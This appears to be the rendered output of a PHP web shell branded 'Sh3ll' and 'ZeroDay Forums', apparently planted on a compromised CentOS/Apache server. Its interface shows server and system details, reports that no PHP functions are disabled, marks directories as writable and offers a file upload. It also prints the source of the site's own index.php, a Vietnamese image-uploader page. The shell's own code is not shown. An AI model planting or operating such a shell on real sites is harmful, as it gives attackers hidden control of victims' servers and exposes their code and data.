JFIF ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkeweb2/upanh/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/thietkeweb2/upanh/index.php
<?php
session_start();
if(!isset($_SESSION['token']) or $_SESSION['token']==''){
    exit('No rule for this url');
}
$arr_admin_type = array('cbnv','staff');
if(!in_array($_SESSION['user_type'],$arr_admin_type)){
    exit('No rule for this url');
}
?>
<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Uploader Image Tools by Adimisoft</title>
    <!-- Bootstrap core CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.3/css/bootstrap.min.css" integrity="sha384-Zug+QiDoJOrZ5t4lssLdxGhVrurbmBWopoEl+M6BdEfwnCJZtKxi1KgxUyJq13dy" crossorigin="anonymous">
    <!-- Custom styles -->
    <link href="../layout/default/node_modules/dm-file-uploader/dist/css/jquery.dm-uploader.min.css" rel="stylesheet">
    <link href="../layout/default/node_modules/dm-file-uploader/demo/styles.css" rel="stylesheet">
</head>

<body>

<main role="main" class="container">

    <h1>Uploader Image Tools by Adimisoft</h1>
    <p class="lead mb-4">
        Một chức năng khuyến mãi của Adimisoft để tải ảnh lên máy chủ và lấy link ảnh, bao gồm hỗ trợ cho hàng đợi, theo dõi tiến trình và kéo và thả.
    </p>

    <div class="row">
        <div class="col-md-6 col-sm-12">

            <!-- Our markup, the important part here! -->
            <div id="drag-and-drop-zone" class="dm-uploader p-5">
                <h3 class="mb-5 mt-5 text-muted">Kéo và thả ảnh vào đây</h3>

                <div class="btn btn-primary btn-block mb-5">
                    <span>Hoặc - Chọn tìm ảnh trên máy tính của bạn</span>
                    <input type="file" title='Click to add Files' />
                </div>
            </div><!-- /uploader -->

        </div>
        <div class="col-md-6 col-sm-12">
            <div class="card h-100">
                <div class="card-header">
                    File List
                </div>

                <ul class="list-unstyled p-2 d-flex flex-column col" id="files">
                    <li class="text-muted text-center empty">No files uploaded.</li>
                </ul>
            </div>
        </div>
    </div><!-- /file list -->

    <div class="alert alert-info" role="alert">
        More setup demos on: <a href="https://thietkewebvumi.com/" target="_blank">https://thietkewebvumi.com/</a>
    </div>

    <div class="row">
        <div class="col-12">
            <div class="card h-100">
                <div class="card-header">
                    Debug Messages
                </div>

                <ul class="list-group list-group-flush" id="debug">
                    <li class="list-group-item text-muted empty">Loading plugin....</li>
                </ul>
            </div>
        </div>
    </div> <!-- /debug -->

</main> <!-- /container -->

<footer class="text-center">
    <p>&copy; Daniel Morales &middot; <a href="https://www.danielmg.org">www.danielmg.org</a></p>
</footer>

<script src="../layout/default/node_modules/jquery/dist/jquery.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.3/js/bootstrap.min.js" integrity="sha384-a5N7Y/aK3qNeh15eJKGWxsqtnX/wWdSZSKp+81YjTmS15nvnvxKHuzaWwXHDli+4" crossorigin="anonymous"></script>

<script src="../layout/default/node_modules/dm-file-uploader/dist/js/jquery.dm-uploader.min.js"></script>
<script src="custom-ui.js?v=<?php echo time();?>"></script>
<script src="custom-img-config.js?v=<?php echo time();?>"></script>
<!-- File item template -->
<script type="text/html" id="files-template">
    <li class="media">
        <img class="mr-3 mb-2 preview-img" src="../layout/default/images/noimage.jpg" alt="Generic placeholder image" style="width: 64px;">
        <div class="media-body mb-1">
            <p class="mb-2">
                <strong>%%filename%%</strong> - Status: <span class="text-muted">Waiting</span>
            </p>
            <div class="progress mb-2">
                <div class="progress-bar progress-bar-striped progress-bar-animated bg-primary"
                     role="progressbar"
                     style="width: 0%"
                     aria-valuenow="0" aria-valuemin="0" aria-valuemax="100">
                </div>
            </div>
            <label>Link ảnh:</label>
            <div class="input-group">
                <input type="text" class="form-control" value="" onclick="this.select();">
            </div>
        </div>
    </li>
</script>
<!-- Debug item template -->
<script type="text/html" id="debug-template">
    <li class="list-group-item text-%%color%%"><strong>%%date%%</strong>: %%message%%</li>
</script>
</body>
</html>


ZeroDay Forums Mini